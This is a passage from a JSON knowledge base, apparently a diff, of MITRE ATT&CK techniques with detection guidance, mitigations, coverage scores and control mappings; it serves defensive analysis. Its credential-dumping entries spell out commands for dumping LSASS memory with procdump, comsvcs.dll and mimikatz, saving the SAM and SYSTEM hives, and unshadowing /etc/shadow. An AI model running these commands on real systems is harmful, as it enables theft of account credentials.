used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run using:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\nBuilt-in Windows tools such as comsvcs.dll can also be used:\n\n* rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)\n\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\n", + "detection": "Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1003.002", + "name": "OS Credential Dumping: Security Account Manager", + "url": "https://attack.mitre.org/techniques/T1003/002", + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.\n\nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe\n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with Reg:\n\n* reg save HKLM\\sam sam\n* reg save HKLM\\system system\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)\n\nNotes: \n* RID 500 account is the local, built-in administrator.\n* RID 501 is the guest account.\n* User accounts start with a RID of 1,000+.\n", + "detection": "Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1003.003", + "name": "OS Credential Dumping: NTDS", + "url": "https://attack.mitre.org/techniques/T1003/003", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)\n\nIn addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)\n\nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n", + "detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1003.004", + "name": "OS Credential Dumping: LSA Secrets", + "url": "https://attack.mitre.org/techniques/T1003/004", + "description": "Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)\n\n[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)", + "detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1003.005", + "name": "OS Credential Dumping: Cached Domain Credentials", + "url": "https://attack.mitre.org/techniques/T1003/005", + "description": "Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)\n\nOn Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)\n\nWith SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.\n\nNote: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)", + "detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nDetection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1003.006", + "name": "OS Credential Dumping: DCSync", + "url": "https://attack.mitre.org/techniques/T1003/006", + "description": "Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.\n\nMembers of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)\n\nDCSync functionality has been included in the \"lsadump\" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)", + "detection": "Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)\n\nNote: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1003.007", + "name": "OS Credential Dumping: Proc Filesystem", + "url": "https://attack.mitre.org/techniques/T1003/007", + "description": "Adversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.\n\nThis functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.", + "detection": "To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/\\*/maps, where the \\* directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1003.008", + "name": "OS Credential Dumping: /etc/passwd and /etc/shadow", + "url": "https://attack.mitre.org/techniques/T1003/008", + "description": "Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats)\n\nThe Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db\n", + "detection": "The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs.", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 2.3277684163133334, + "adjusted_score": 2.3277684163133334, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.6", + "3.11", + "3.12", + "4.1", + "4.7", + "4.8", + "5.2", + "5.3", + "5.4", + "6.1", + "6.2", + "6.8", + "11.3", + "14.1", + "14.3,16.1", + "16.9", + "18.3", + "18.5" + ], + "nist_controls": [ + "AC-16", + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-7", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "CP-9", + "IA-2", + "IA-4", + "IA-5", + "SC-28", + "SC-39", + "SI-12", + "SI-2", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1005", + "name": "Data from Local System", + "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n", + "url": "https://attack.mitre.org/techniques/T1005", + "tactics": [ + "Collection" + ], + "detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Script: Script Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + } + ], + "cumulative_score": 0.5222382413542856, + "adjusted_score": 0.5222382413542856, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-7", + "CM-2", + "CM-5", + "CM-6", + "IA-2", + "IA-5", + "SC-28", + "SC-39", + "SI-3", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1006", + "name": "Direct Volume Access", + "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\n\nUtilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)", + "url": "https://attack.mitre.org/techniques/T1006", + "tactics": [ + "Defense Evasion" + ], + "detection": "Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)\n\nMonitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Command: Command Execution", + "Drive: Drive Access" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.15289523809523808, + "adjusted_score": 0.15289523809523808, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1007", + "name": "System Service Discovery", + "description": "Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist /svc\" using [Tasklist](https://attack.mitre.org/software/S0057), and \"net start\" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "url": "https://attack.mitre.org/techniques/T1007", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.14832380952380952, + "adjusted_score": 0.14832380952380952, + "has_car": true, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1008", + "name": "Fallback Channels", + "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.", + "url": "https://attack.mitre.org/techniques/T1008", + "tactics": [ + "Command And Control" + ], + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "cumulative_score": 0.2453047619047619, + "adjusted_score": 0.2453047619047619, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "13.3,13.8" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1010", + "name": "Application Window Discovery", + "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.", + "url": "https://attack.mitre.org/techniques/T1010", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.1312095238095238, + "adjusted_score": 0.1312095238095238, + "has_car": true, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1011", + "name": "Exfiltration Over Other Network Medium", + "description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network", + "url": "https://attack.mitre.org/techniques/T1011", + "tactics": [ + "Exfiltration" + ], + "detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1011.001", + "name": "Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth", + "url": "https://attack.mitre.org/techniques/T1011/001", + "description": "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel.\n\nAdversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.", + "detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ], + "cumulative_score": 0.2656666666666667, + "adjusted_score": 0.2656666666666667, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "4.1,18.3,18.5" + ], + "nist_controls": [ + "AC-18", + "CM-6", + "CM-7", + "SI-4" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1012", + "name": "Query Registry", + "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "url": "https://attack.mitre.org/techniques/T1012", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management 